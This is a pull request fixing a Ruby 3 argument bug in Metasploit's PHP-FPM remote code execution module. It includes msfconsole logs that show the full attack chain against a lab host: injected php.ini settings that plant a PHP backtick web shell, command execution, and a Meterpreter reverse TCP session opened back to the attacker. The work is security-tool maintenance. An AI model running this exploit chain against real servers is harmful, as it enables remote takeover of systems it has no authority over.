### PR TITLE
Fix exploits/multi/http/php_fpm_rce for ruby 3

### DIFF
--- a/modules/exploits/multi/http/php_fpm_rce.rb
+++ b/modules/exploits/multi/http/php_fpm_rce.rb
@@ -163,7 +163,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def repeat_operation(op, opts = {})
     datastore['OperationMaxRetries'].times do |i|
       vprint_status("#{op}: try ##{i + 1}")
-      res = opts.empty? ? send(op) : send(op, opts)
+      res = opts.empty? ? send(op) : send(op, **opts)
       return res if res
     end
     nil


### PR DESCRIPTION
This change fixes the exploits/multi/http/php_fpm_rce exploit on latest Kali.

## Test environment

Using Kali Rolling:

```
root@kali:~# ruby --version
ruby 3.0.3p157 (2021-11-24 revision 3fb7d2cadc) [x86_64-linux-gnu]
root@kali:~# msfconsole --version
Framework Version: 6.2.0-dev
````

## Steps to reproduce

- [ ] `msfconsole --quiet`
- [ ] `use exploit/multi/http/php_fpm_rce`
- [ ] `set rhosts 192.168.6.2`
- [ ] `set verbose true`
- [ ] `run`

## Before change

```
root@kali:~# msfconsole --quiet
To use retry middleware with Faraday v2.0+, install `faraday-retry` gem
msf6 > use exploit/multi/http/php_fpm_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_fpm_rce) > set rhosts 192.168.6.2
rhosts => 192.168.6.2
msf6 exploit(multi/http/php_fpm_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/php_fpm_rce) > run

[*] Started reverse TCP handler on 192.168.6.1:4444 
[*] Sending baseline query...
[*] Base status code is 200
[*] Detecting QSL...
[*] Status code 502 for qsl=1765, adding as a candidate
[+] The target is probably vulnerable. Possible QSLs: [1765]
[*] Extended QSL list: [1755, 1760, 1765]
[*] Doing sanity check...
[*] Detecting attack parameters...
[*] send_params_detection: try #1
[-] Exploit failed: ArgumentError wrong number of arguments (given 1, expected 0; required keywords: qsl_candidates, customh_length, detect_method)
[*] Exploit completed, but no session was created.
```

## After change:

```
root@kali:~# msfconsole --quiet
To use retry middleware with Faraday v2.0+, install `faraday-retry` gem
msf6 > use exploit/multi/http/php_fpm_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_fpm_rce) > set rhosts 192.168.6.2
rhosts => 192.168.6.2
msf6 exploit(multi/http/php_fpm_rce) > set verbose true
verbose => true
msf6 exploit(multi/http/php_fpm_rce) > run

[*] Started reverse TCP handler on 192.168.6.1:4444 
[*] Sending baseline query...
[*] Base status code is 200
[*] Detecting QSL...
[*] Status code 502 for qsl=1765, adding as a candidate
[+] The target is probably vulnerable. Possible QSLs: [1765]
[*] Extended QSL list: [1755, 1760, 1765]
[*] Doing sanity check...
[*] Detecting attack parameters...
[*] send_params_detection: try #1
[*] Iterating until the PHP option is enabled (session.auto_start=1)...
[*] Attack params found, disabling PHP option (session.auto_start=0)...
[+] Parameters found: QSL=1760, customh_length=19
[+] Target is vulnerable!
[*] Performing attack using php.ini settings...
[*] send_attack_chain: try #1
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=u
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/u
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[z]`?>"
[*] send_attack_chain: try #2
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=u
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/u
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[z]`?>"
[*] send_attack_chain: try #3
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=u
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/u
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[z]`?>"
[*] send_attack_chain: try #4
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=u
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/u
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[z]`?>"
[*] send_attack_chain: try #5
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=u
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/u
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[z]`?>"
[*] send_attack_chain: try #6
[*] Sending php.ini setting: short_open_tag=1
[*] Sending php.ini setting: html_errors=0
[*] Sending php.ini setting: include_path=/tmp
[*] Sending php.ini setting: auto_prepend_file=u
[*] Sending php.ini setting: log_errors=1
[*] Sending php.ini setting: error_reporting=2
[*] Sending php.ini setting: error_log=/tmp/u
[*] Sending php.ini setting: extension_dir="<?=`"
[*] Sending php.ini setting: extension="$_GET[z]`?>"
[+] Success! Was able to execute a command by appending 'which which'
[*] Trying to cleanup /tmp/u...
[*] send_backdoor_cleanup: try #1
[*] send_backdoor_cleanup: try #2
[*] send_backdoor_cleanup: try #3
[+] Cleanup done!
[*] Sending payload...
[*] send_payload: try #1
[*] send_payload: try #2
[*] Sending stage (39860 bytes) to 192.168.6.2
[*] Meterpreter session 1 opened (192.168.6.1:4444 -> 192.168.6.2:59130) at 2022-06-03 08:58:42 +0000
[*] Remove /tmp/u and kill workers...
[*] send_cleanup: try #1
[*] send_cleanup: try #2
[*] send_cleanup: try #3
[+] Done!

meterpreter > shell
Process 1092 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```